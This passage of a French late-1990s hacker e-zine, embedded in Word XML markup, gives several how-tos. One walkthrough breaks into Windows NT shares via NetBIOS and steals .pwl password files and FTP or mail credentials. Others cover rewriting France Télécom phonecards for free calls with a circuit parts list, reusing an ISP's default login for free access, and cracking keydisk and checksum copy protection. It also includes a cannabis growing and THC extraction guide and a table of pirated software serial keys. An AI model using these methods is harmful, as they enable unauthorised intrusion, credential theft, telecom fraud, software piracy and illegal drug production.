          <w:szCs w:val="40"/>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a vous dirait bien de pouvoir vous ballader sur le serveur nt débile d'une entrepris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d'avoir leurs pass... ben rien de plus simple. NT est un vrai fromage à tro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Vous devez avoir le protocol NetBEUI installé (et en plus... sous Window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Ensuite, prenez l'ip du gars (on va prendre 195.186.50.156 comme exemp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i c'est un serveur dont vous n'avez que le nom de domaine, faites un ping sur son DNS dans  un prompt msdos qui vous donnera l'ip.</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ing -n 1 -w 3000 www.biglamer.co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llez dans un prompt msdos et faites simpleme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btstat -A 195.186.50.15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Pour pouvoir se connecter sur la machine, vous devez impérativement voir un &lt;20&gt; se  déballer sur votre écran. Du gen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NetBIOS Remote Machine Name Tab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Name               Type         Stat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ERVEUR        &lt;00&gt;  UNIQUE      Register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IGLAMER       &lt;00&gt;  GROUP       Register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ERVEUR        &lt;03&gt;  UNIQUE      Register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ERVEUR        &lt;20&gt;  UNIQUE      Register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IGLAMER       &lt;1E&gt;  GROUP       Register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i là, nous ne voyez pas de &lt;20&gt;, c'est cu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i la réponse est Host not found, c'est que les ports 138, 139, etc ne sont pas ouverts  (encore plus cuite qu'ava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i vous avez bien le &lt;20&gt;, créez le fichier c:\windows\lmhos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et inscrivez ceci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95.186.50.156 SERVEUR #P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en premier c'est l'ip de notre gars ensuite le nom du remote (correspond au &lt;20&gt;) et  ensuite le #PRE qui est obligatoi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Fait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btstat -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pour mettre en cache tout ç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Ensuite, on va enfin pouvoir voir les disques auxquels on peut accéder en faisa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et view \\SERV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qui, si on peut y accéder, donnera kkechose du gen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harename    Type         Com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C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D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E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F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command was completed successfull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Chouette, on peut aller sur son C, et le connecter à votre ordi, faites finaleme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et use * \\SERVEUR\c</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Dans ce cas-ci, on peut aussi accéder à D, E et F, y a qu'à remplacer c par la lett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On peut aussi, si on ne sait pas lequel est le disk de win, ajouter un $ après le c.</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Si le nom du remote comporte un espace, mettez simpleme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et use * "\\SERVEUR\c"</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Une fois sur le disque dur, allez dans c:\windows\ et choppez tous les *.pw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Vous pouvez les cracker avec glide (ne marche pas tout le temp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Faites aussi un ptit tour dans ses fichiers .ini si il a wsftp ou autres mirc, eudora,  cuteftp.</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i vous voulez hacker bcp de monde comme ça, je vous conseille de faire carrément des scans  de segments avec WsPingProPack de IPSwitch (www.ipswitch.com) que je trouve très bie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Backdoor</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5 ) Rechargez vos télécartes France Télécom ! :</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us avez toujours rêvé de ne pas payer vos communications téléphoniques, quand vous téléphonez à l’étranger, à l’autre bout de la France, à un G.S.M. ou un Pager, ou quand vous voulez faire un 083668... ou un 3670 :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iensur, il y a le blue boxing pour pouvoir faire ça de chez soi, mais il y a une solution plus simple et moins chiante, lire et écrire sur les télécartes ! :o)))  ( Et puis, si vous êtes des petits malins, vous pouvez les refourgue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ECTEUR DE TELECAR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U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ire et écrire dans une carte à puce téléphone, type Télé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 France Téléco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OMPOSI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Un ensemble électronique, selon schéma joi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Un programme en BASIC compilé, source ascii et .exe join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Microsoft QuickBASIC Ver 3.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Un cordon parallè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Un micro-ordinateur tournant sous DO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RANCH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limentation se fait par le secteur (quelques wat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 liaison avec l'ordinateur se fait par un cordon impriman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aralléle, dont le coté Centronics est relié au lecteur, e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coté DB25 est relié au port parallèle LPT1 de l'ordinat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ttention: le programme livré est configuré pour LPT1, cependa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ette configuration peut être modifiée facilement sur le sour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qui doit ensuite, bien entendu, être recompil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OMMANDES UTILISAT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Sur le lecteur:    interrupteur Marche/Arrêt sect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Commutateur Autorisation d'écriture sur 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voyant Marche/arrê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voyant clignotant Autorisation d'écritu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Dans le programme: lire carte sur écran (pas de nom de fichier donn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lire carte sur écran ET fichier (nom de fichier donn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écrire fichier sur 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ONCTIONN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de LECTU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 lecture des bits est faite en sequentiel, par incré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u compteur d'adresse, du bit 0 au bit 255. La carte est ainsi</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alayée, les bits sont représentés par 0 ou 1, selon leur éta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ous forme d'un tableau de 16 lignes de 2 blocs cons‚cutifs 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8 bits (256 bits en tout). Ce tableau est affiché à l'écran, e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éventuellement stocké dans un fichier Ascii si un nom de fichi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alide à été donné lors de la demande du programm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xemple de représentation écra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gt; enter file name to store data i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Reading data from memory card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0111111 0000001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0011001 0100011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0111111 1001011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110000 0010001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1000111 100111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10000 0000011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1111111 1111111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1111111 1111111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1111111 1111111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1111111 1111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00000 0000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00000 0000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00000 0000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00000 0000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00000 0000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00000000 1111111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Full: 50 U  -  Remaining: 0 U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gt; hit &lt;R&gt; to read, &lt;W&gt; to write, or &lt;Q&gt; to qu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même exemple sous forme fichi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0 1 1 1 1 1 1 0 0 0 0 0 0 1 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0 0 1 1 0 0 1 0 1 0 0 0 1 1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0 1 1 1 1 1 1 1 0 0 1 0 1 1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1 1 0 0 0 0 0 0 1 0 0 0 1 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1 0 0 0 1 1 1 1 0 0 1 1 1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1 0 0 0 0 0 0 0 0 0 1 1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1 1 1 1 1 1 1 1 1 1 1 1 1 1 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1 1 1 1 1 1 1 1 1 1 1 1 1 1 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1 1 1 1 1 1 1 1 1 1 1 1 1 1 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1 1 1 1 1 1 1 1 1 1 1 0 0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0 0 0 0 0 0 0 0 0 0 0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0 0 0 0 0 0 0 0 0 0 0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0 0 0 0 0 0 0 0 0 0 0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0 0 0 0 0 0 0 0 0 0 0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0 0 0 0 0 0 0 0 0 0 0 0 0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 0 0 0 0 0 0 0 1 1 1 1 1 1 1 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l s'agit d'une carte 50 unitées, "vi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de ECRITU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écriture, c'est à dire faire passer un bit 0 à 1, n'est possib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que de la ligne 7 à la fin de la dernière ligne. En effet, l'accè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n écriture des bits  0 à  96 est inhibé sur la carte. L'écritu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onsiste à adresser le bit voulu, configurer correctement les discre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 et B (se reporter au PCX de la carte) et envoyer un pulse de 21V s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 pin 6 VPP de la carte. Le 21V aura prélablement été "autorisé" pa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commutateur SW02 (led rouge clignotante). Comme pour la lectu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ous les bits sont balayés séquentiell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TTENTION: le pulse de 21V doit avoir une largeur de 50ms. En cas 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roblème d'écriture, vérifier à l'oscilloscope si la largeur ne s'é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as trop de cette valeur (collecteur de Q01, pin 6 VPP du connecteur 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élécarte). Règler éventuellement la boucle de temporisation … la lig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00 du programme et recompiler. Pour mesurer, utiliser une carte pluggé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à l'envers pour ne pas la modifier tout en validant le contact de fin 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ourse du connecteur, et lancer une écriture, l'oscilloscope éta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éclenché par le puls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es GROS problèmes: un bit écrit ne s'efface plus, c'est à di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qu'un bit 1 ne pourra pas étre "écrit" en 0. Autrement dit, u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arte valide dans laquelle on écrit des 1 peut être "vidée" et u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arte "vide" ne peut pas être revalidée par des écritures de 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 plus, ce type de carte ne fonctionne pas sur les distributeur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automatiques de billets, lecteurs de cartes de crédits et autr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ystèmes intéressan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ichier à utilis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vec un éditeur Ascii, constituer un fichier en respectant le modè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i-dessus, à savoi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le premier caractère est le premier b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n'utiliser que des 0 ou des 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les bits sont consécutifs et séparés par un espa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chaque ligne se termine par un espace et un crlf (20 0D 0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cet ensemble suit immédiatement le dernier bit de la lig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il y a 16 lign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le dernier bit de la 16ième ligne est le dernier b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out ce qui "dépasse" n'est pas pris en compte par le programm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contenu des 6 premières lignes est indifférent (… la condi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0 ou 1 près), puisque l'accès en écriture des 96 premiers bits es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nhibé sur la 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out autre format peut conduire … un plantage du programm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APPE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ant que le switch SW02 est sur off (led clignotante éteinte), aucu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écriture n'est possib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ODAGE D'UNE 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111111 00000011      infos France Téléco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10011001 01000110      "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10111111 10010110      "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00110000 00100011      "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11000111 10011100      "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00010000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00000110      00000110 = 50U,   00010011 = 120U </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t xml:space="preserve">                 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Wingdings;Symbol" w:cs="Wingdings;Symbol" w:ascii="Wingdings;Symbol" w:hAnsi="Wingdings;Symbol"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ß</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t xml:space="preserve"> à partir d'ici, accès en écritu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111111 11            inutilis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11111      0 = unité valide, 1 = unité consommé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11111111 11111111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11111111 11111111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111111 11110000      "   (limite des 50U, le reste inutilis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00000000 00000000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00000000 00000000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00000000 00000000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00000000 00000000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00000000 00000000      "  (limite des 120U, le reste inutilis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00000000               inutilis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1111111      tout à 1 pour carte vid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es 96 premiers bits contiennent des informations France Télécom,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t leur accès est "condamné" par le claquage d'un fusible inter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à la carte (pin 8 FUS) avant la mise sur le march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maximum de capacité d'une carte étant de 120 unités (1 unité</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correspond à 1 bit), il restera toujours des bits à 0 sur un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arte "vide", qui pourront être utilisés pour l'écriture d'un co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ersonnel. Cette carte peut, par exemple, servir ensuite de clé d'accè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ans un système imaginé par l'utilisateur, et utilisant un lect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ISTE DES COMPOSAN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Item  Quantité  Référence   Désignation       Par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______________________________________________________</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       1    C01         cond. chimique    1000uF/40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       1    C02         cond. chimique    1000uF/16V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3       1    C03         cond. chimique    47uF/10V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4       2    D02,D01     diode             1N4002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5       1    D03         diode             1N4148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6       1    D04         LED clign. roug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7       1    D05         LED ver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8       3    R01,R09,R11 resistance 1/4w   4.7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9       2    R03,R04     resistance 1/4w   à ajuste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       1    R02         resistance 1/4w   3.3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1       1    R05         resistance 1/4w   100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2       1    R06         resistance 1/4w   10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3       2    R07,R08     resistance 1/4w   22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4       1    R10         resistance 1/4w   2.2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5       1    R12         resistance 1/4w   1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6       1    Q01         transistor PNP    BC557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7       1    Q02         transistor NPN    BC547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8       1    REG02       IC regulation     7805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9       1    REG01       IC regulation     LN317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0       1    T01         transformateur    Sec 2x12V/3VA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1       1    F01         fusible           0.315A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2       1    P01         Cordon secteu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23       1    J01         Connecteur Carte a pu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24       1    J02         Connecteur Centronics femel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5       1    SW01        Interrupteur secteu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26       1    SW02        Commutateur a levi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Boîtier, circuit imprimé d'essais au pas de 2.54, porte-fusibl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quincaillerie divers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Item 23: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electronic BP 513 Lille Cedex</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Catalogue 1993, page 6/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Reference 51.9292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Ce connecteur est prévu pour les cartes ISO et AFNOR. Relier l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pins homologues entre elles (1 à 1, 2 0à 2 etc). La différenc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entre les normes concerne la position de la zone de contact d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la carte: centrée ou excentré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Item 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R03: a ajuster pour 21.5V Vpp, environ 205 ohms (330U // 560U)</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R04: a ajuster clignotement led ok, environ 2.2k.</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fichier Telecart.zip est join au zine (il est aussi trop gros pour l’uuencoder) il contie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ART.BAS   :  Source en Basic.</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ART.EXE   : Fichier Executab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XEMPLE.50         : Sortie d’une télécarte 50 Unités Vi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XEMPLE.120       : Sortie d’une télécarte 120 Unités Vid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_BD.PCX   :  Shéma électrique 1 / 4 Bas-Droi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_BG.PCX   :  Shéma électrique 2 / 4 Bas-Gauch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_HD.PCX   :  Shéma électrique 3 / 4 Haut-Droi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_HG.PCX   :  Shéma électrique 4 / 4 Haut-Gauch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LECONN.PCX  :  Connecteur Spécifique Télécar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ELECART.PCX   :  Télécarte avec descriptif.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chéma électriqu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Un dump écran en PCX du schéma électrique est fourni. Compte tenu de sa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aille dans le programme de saisie de schémas, il a été coupé en quat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morceaux, avec un généreux recouvreme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cteur de cart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a réalisation est simple et, mis à part le connecteur de carte à puc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ne fait pas appel à des composants exotiques. Afin de pouvoir utiliser l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ormats ISO et AFNOR de cartes, relier les pins homologues du connect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à savoir 1 à 1, 2 à 2 .... 8 à 8. Les pins 9 et 10 correspondent au switch</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 fin de course, fermé quand la carte en enfoncé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rogramm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Il est simple et les REM devraient suffire comme explications. Un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ransposition dans un langage moins NAZE que le Basic ne devrait pa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être un problême insurmontable. Par esprit de contradiction, et sui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aux décisions de Mr Toubon, les messages écran en anglai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atant de la première version, ont été conservés ! ;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ilà</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i vous avez fait une transpo ds un autre language ou sous Win ou si vous avez réussi à implément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une modif permettant de revalider une carte vide, e-mailez moi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BoBmArLe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6 ) Comment ne pas payer l’abonnement à H.O.L. :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>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a un truc tout con pour pas payer d’abonnement à HOL, ils donnent un login et un password par defaut pour se connecter quand on s’abonne, et ça marche partout en France, alors qu’avec Infonie, par exemple, ils connectent forcément à Panam, remarque pour les parisiens, ça gere !Je pense qu’il y’a moyen avec d’autre abonnements, peut etre avec le wannado de Mr Fuck Telecom, pour l’instant, je vous dis comment faire avec HOL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Vous installez le kit de connexion ou si vous l’avez pas, vous créez une nouvelle entrée dans connexion réseau à distance, dans les propriétés, vous mettez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dresse du DNS primaire : 194.149.160.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dresse du DNS secondaire : 194.149.160.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m de domaine : hol.f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Ensuite pour l’ utilisateur vous mettez : Abonnement  et pour le mot de passe : Hava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uis vous choisissez pour le n° d’appel, le point le plus proche de chez vous, c’est à di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ordeaux : 05 57 35 04 2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ijon : 03 80 68 37 9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Grenoble : 04 76 03 75 8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 Raincy : 01 41 52 52 9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ille : 03 20 89 57 9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imoges : 05 55 42 75 6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yon : 04 72 84 13 9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arseille : 04 91 99 33 4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assy : 01 69 32 81 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etz : 03 87 50 81 8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ontpellier : 04 67 10 47 1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antes : 02 51 80 20 9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ice : 04 92 29 86 6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rléans : 02 38 24 22 9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aris : 01 53 26 65 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ennes : 02 99 22 28 6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ouen : 02 32 83 24 3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aint Quentin en Yvelines : 01 39 44 76 1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trasbourg : 03 88 18 21 1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oulouse : 05 61 16 33 5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ilà, pte’t que j’en ai oublié, dans ce cas, e-mailez moi. Si vous voulez utiliser ça tout le temps vous pouvez choper une adresse e-mail gratos avec mygale ou lokace, (ou hotmail mais c’est plus chia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on, maintenant y reste plus qu’a trouver un moyen de pas payer les communications ! ;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oBmArLe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Haettenschweiler" w:cs="Haettenschweiler" w:ascii="Haettenschweiler" w:hAnsi="Haettenschweiler"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>7 ) Cours de Crack ( Protection  Keydisk, fichiers compactés, cheksum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Hop c'est parti!!!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vais donc vous éclairer sur la protection de type keydisk (insér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disk a...enfin ce genre quoi!).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e vais vous expliquer aussi les problèmes de compactages facil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r‚solvables, le problème posé par un checksum et comment y remédie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b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>I) La protection keydisk</w:t>
      </w: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on fonctionnement repose sur l'appel de l'interruption 13h.Donc,</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l suffit de bloquer cette int. Ensuite, faites partir votre programm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l s'arrêtera s–rement plusieurs fois. Noter l'adresse ou votre int 13h</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 cherché sur le drive (celle d'avant!!).Ensuite, enlever le breakpoi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sur l'int, et sortez du prg.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Relancer votre prg en bloquant l'int 13h, puis une fois que vous avez retrouvé l'adresse voulue, faites un program step pour éviter de tracer l'int, puis après utiliser l'intruction trace. On peut remarquer qu'ava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appel de l'int 13h,les registres ont certaines valeur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ah=2(fonction de l'int 13 pour lire sur un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al=nbre de secteurs a lir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ch=le num‚ro du cylindre                cl=le numéro du secteur                 dh=le numéro de la tête                 dl=le num‚ro du dri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s:bx pointe sur l'adresse dans laquelle la donnée lue sera stockée. Vous pouvez retrouver ces indications dans tout livre d'assembl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près l'int 13h, on remarque que le carry flag est = 1. Ceci signifie qu'il n'a pu lire la donnée sur le disk. C'est ce qu'il faut puisque le prg cherche un bad sector! Donc si le carry flag = 0,c'est qu'il y a un disk dans le driv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Ensuite le prg testera la valeur trouvée sur le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Je vous donne le cas d'école de ce genre de protecti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utilisation de l'int 13h pour lire sur le disk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est du carry fla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est de la (ou des) valeur(s) lu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ien, chaque prg a sa variante!! Généralement, le prg vous rejette tjr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 la même adresse donc regardez bien les sauts qui suiv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il n'y a pas de disk dans le drive, le carry flag est mis a 1,mais l'int renvoie un code d'erreur dans ah qui est différent s'il lit un mauvais secteur ou s'il lit un secteur défectueux!</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Donc pour arriver … enlever la protectio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l faut modifier les sauts après le test du carry flag, du code d'erreu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et de la (ou des) valeur(s) lu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ette protection se fait de plus en plus rare pcq elle était trop simplea cracker. Maintenant quand on la rencontre, elle est béton (Moktar,if i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moves shoot it...). Les depros ne sont pas impossibles mais très dur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b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>II) Les fichiers compacté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es fichiers compact‚s sont de plus en plus courants. Ils sont faciles …</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:right="616" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
        </w:rPr>
        <w:t xml:space="preserve">repérer. Leur header en porte la marque comme Lzexe ou Pkli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our Lzexe, le header est parfois enlevé. On remarque ce détail par la pla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ibre en offset 44 du secteur relatif 0 (je crois...). Compactez un fichier exe et regardez ou est le header. Vous verrez LZ91 si votre fichier est compact‚ avec lzexe v0.91.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Pour Pklite, il existe un option extra compression et on ne peut plus d‚compacter le fichier avec pklite ensuite. Il faut donc utiliser Dislite ou Pkunlite pour y remédie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our inf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Croisière pour un cadavre est compacté avec lzexe 91,les headers ont été enlevés; de plus les fichiers D1,D2,etc... sont en fait des fichiers exe (faciles a reconnaître Q cause des 2 1ers octets MZ)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Alone in the Dark est compacté par leur propre compacteur. Il y a même un fichier compacté ou on peut distinguer 2 headers de fichiers déjà compactés par pkli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b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>III) Le checksum</w:t>
      </w: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Qu'est-ce que c'es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est une addition d'octets lus sur le disk courant. Le prg s'assure qu'il n'a pas été modifié d'une façon assez primaire. On y remédie facil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la dépro de Bat II utilise ce procédé .Il y a eu 2 dépros parues ici pour le même jeu: ceci vient du checksum!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J'avais modifié le 74 en 75 donc le prg trouvait 1 de plus ke le checksum normal donc j'ai modifié un FE en FD pour rétablir le checksum et le prg est cont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Newcome avait remplacé lui le 74 en EB donc il a modifié le FE en 85 je croi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Comment remarke-t-on un checksu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ous êtes sous votre debugger et hop vous stoppez au niveau des cod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vous trouvez le cmp fatal, vous modifier la valeur et hop ca passe. Vous modifier avec pctools et le prg plant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Il y a une bonne chance qu'il y ai un checksum.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n peut reparer le checksum directement dans le prg tracé, il utilise l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instructions lodsb et stosb.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Voilà, j'ai donné ces astuces pcq elles peuvent être utiles à tout moment.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l va de soi que les résidents sont nécessaires pour les prgs ki so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compactés par des compacteurs "bâtard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Voilà c'était pas trop compliqué... J'espère avoir été clair.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Bon crack a tou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R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8 ) Nicolas le jardinier et sa wEEd mAGiQUe </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>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on, alors là je vous remet le texte de m0sfet qui date de NoRouTe #4, comme il est encore valable, que vous l’avez peut-etre pas tous lu, et que c’est la saison de planter, (moi j’attend un peu car en bretagne on se croirait pas encore au printemps cette année !) ;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oBmArLe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Yo! C'est bientot le printemps, il est temps de sortir dans votre jardi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fin de planter la sainte semenc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us avez compris de quoi je veux parler... l'immuable, la veneree sUPERwEE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lors d'abord, faut recuperer des belles graines (elles sont grises, fon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nviron 4 mm de diametre, un peu ovales avec la tete pointu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lles ne doivent pas etre vertes. Il faut savoir que environ 70% des grain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oussent correctement. Il faut en recuperer environ une vingtaine po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ommencer, afin d'avoir de beaux plants par la suit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on, on est en avril. les dernieres gelees sont passees, c'est bon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On peut commencer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1-Prenez un bac en platique (40cm *40cm environ). Mettez du coton hydrophil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u fond (environ 5 cm d'epaisse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Humidifiez le. Pas trop trop (faut pas que ce soit un marecage) mais quan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me, n'hesitez pas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2-Posez vos graines, bien reparties sur toute la surface du bac. La point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ien en haut, vers le cie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3-Posez maintenant par dessus une *fine* couche de coton hydrophile (1mm, mem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as). Faut voir les graines a traver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4-Laissez le bac le plus au jour. N'hesitez pas a le laisser sous u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ampe, avec 1h de nuit par jour (faut quand meme garder le cycle nature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eci accelere la premiere phas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ttendez... Les graines vont s'ouvrir, puis des racines vont se developpe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ans le coton. Deux petites feuilles vertes vont se developper, pui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eux autres, puis d'autres petites feuilles... C'est bon. Humidifiez toujour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aut jamais que ca seche. Au bout de deux-trois semaines, ca doit etre bo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s plants sont suffisament gros, faut les replante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5-Le mieux est de les placer dehors, dans de la bonne terr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Tout d'abord, faut faire une serre ! C'est facile, il suffit de plier u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izaine d'arceaux d'acier, les planter dans le sol, les uns apres l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utres, parallelement, puis de poser dessus une bache en plastiqu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transparent. Faire tenir la bache par terre avec des pierr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  &lt;----------------- arceau d'acier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lt;- so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intenant, faut replanter les plants... Pour cela, virez les DELICATEMEN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u bac en plastique. Faut pas casser les racines, c'est hyper fragil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aites hyper gaffe ! C'est le moment ou il y a le plus de risque po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s plants ! Et replantez les sous la serre, avec des intervalles de 70 c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nviron (hehe, ca va grandir ! ;)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6-Faut arroser regulierement (la on doit etre au mois de Juin). Il fai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hyper chaud. L'ideal est de mettre un systeme d'arrosage automatiqu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genre un tuyau perce avec des epingles, et relie a un robinet que vou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ouvrez une fois le matin pendant 10 secondes et une fois le soi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us pouvez meme y coller une electro-vanne qui s'ouvre et se ferm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utomatiquement avec une interface collee a votre PC et un p'tit programm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n C sous Linux tout con !(la y'a Pixel4 qui retorque: "hep, hep, sD4, le C</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est nul, si tu veux je te code un truc en ASM80x86 mode protege, j'en a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our deux secondes, et ca tournera dix fois plus rapidement ! ;)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7-La vous allez halluciner, si vous vous en occupez bien, ca va grossi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ien comme il faut. (L'ete dernier, vers Juin, mes plants prenaien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jusqu'a 10cms par jour !!!). Bon, la on est en Juin, vos plant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oivent mesurer 1m et quelques si tout se passe bie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On va pouvoir differencier males/femelles. Les males sont ceux qui on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u pollen (les trucs jaunes). Ca faut y virer. Faut pas qu'ils feconden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s femelles. Y'en a qui se servent du pollent... mouai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8-Bon... vous continuez a vous en occuper, toujours bien arroser, deu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ois par jour environ. Vous devez commencer a avoir des jolies tet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est sur le bout des branches femelles, la ou il y a plein de feuill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t la ou ca sent hyper bon). Il y a meme de la resine normalemen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s plants sont mainenant a leur apogee (mi aout), genre deux metres e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quelques si tout va bien. Les males vont mourir. Faut les couper, et vit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s fumer ! (le male c'est pas top, mais c'est pas mal quand meme ;)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9-Continuez a vous occuper des femelles, jusque en Septembre. La ca commenc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 faire froid. Les graines commencent a tomber. Recuperez les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 partir de 20 graines j'ai recupere environ 350 grammes de graines ! Ca</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oit en faire quelques milliers !!!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oment emouvant, vous leur coupez les pieds, et vous les enfermez dans u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ndroit noir, bien ventile (pas un placard bien ferme, sinon ca pourrit e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eux jours !). Attendez que ca seche. La ca doit sentir un max la resi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b/>
        <w:tab/>
        <w:t>Yahoo !!! Vous avez des tonnes d'herb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10-Une fois sec, c'est tout bon... Vous pouvez vous rouler des bons gro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pliffs de weed (hehe, 24 feuilles fut le record de l'ete dernier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100 % naturel ! Vous n'en trouverez pas de la meilleur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11-Si vous n'aimez pas la weed, y'a moyen de faire du mato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Il faut:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl w:val="false"/>
        <w:ind w:firstLine="284"/>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ind w:firstLine="284"/>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Kg d'herb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b/>
        <w:t xml:space="preserve"> 20 g de resine de pi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b/>
        <w:t xml:space="preserve"> un fo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b/>
        <w:t xml:space="preserve"> une grande casserole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:widowControl w:val="false"/>
        <w:ind w:firstLine="284"/>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un peu d'essence de therebenti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b/>
        <w:t xml:space="preserve"> un petit plat qui va au fo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b/>
        <w:t xml:space="preserve"> des ustensiles pour remue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vec 1Kg d'herbe on peut en faire environ 200 Gramm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our cela, prenez une grande casserole, mettez l'herbe dedans avec de l'alcool a 9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aut que l'alcool recouvre l'herb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aites chauffer (pas trop, ca rique de prendre feu ;) ). Pas sur le gaz, s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ne plaque chauffante, a resistance. Jusqu'a ce qu'il y ait des bons peit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ouillons. Laisser chauffer deux heur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eparez l'alcool de l'herbe. GARDEZ LE !!! C'est lui qui renferme le THC</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tetra hydro cannabinol). Remplacez le par du nouveau. Refaites bouilli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oucement. Refaites chauffer pendant deux heur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irez l'alcool, gardez le. Repetez les etapes precedentes, mais cette fois c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avec une temperature legerement plus fort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ila, vous avez plein de litres d'alcool bourres de THC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intenant, versez l'alcool dans une grande casserolle, et faites chauffe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jusqu'a obtenir que des residus pateux verts. Ajoutez un peu d'essence d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therebentine afin de diluer le tout, et de la resine de pin afin d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 solidifier (20g de resine enviro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ttez le tout dans un plat carre, passez au four 20 minutes a don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a va gonfler, votre matos est pret !!! A tabl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0sfet.</w:t>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9 ) Mes Utilitaires préférés ! :</w:t>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Y’a des logiciels qui méritent d’être connus, qui sont indispensables et que j’aime bien, je vais vous en citer quelques un et vous donner quelques sérials et cracks pour eu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Vous pourrez trouver tous ces logiciels sur le web normalement, si vous vous démerdez bie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t bientôt sur le site G.L.U.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bl>
      <w:tblPr>
        <w:tblW w:w="9993" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-77" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="70" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1771"/>
        <w:gridCol w:w="3969"/>
        <w:gridCol w:w="4253"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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rPr>
                <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Nom</w:t>
            </w:r>
          </w:p>
        </w:tc>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rPr>
                <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425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rPr>
                <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
                <w:b/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook" w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Serial / Crack</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WinZi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Il n’est plus à présenter, mais peut-être que vous avez pas le sérial.</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ser : AUTODES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Key : D147085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ute Ftp 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 meilleur Client FTP qui exist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rack uuencodé plus loi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WebExpert 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 meilleur Logiciel de création de pages en français. (FUCK FRONTPAGE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ser : N.. and O.. and P (blacklist suxx)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Key : X6XYKY-V63B3F-5CHYQ8-VJHB7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Winzip Self-Extractor</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our créer des exe auto-extractable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ser : Unlimited Use</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Schoolbook" w:hAnsi="Century Schoolbook" w:eastAsia="Century Schoolbook" w:cs="Century Schoolbook"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr/>
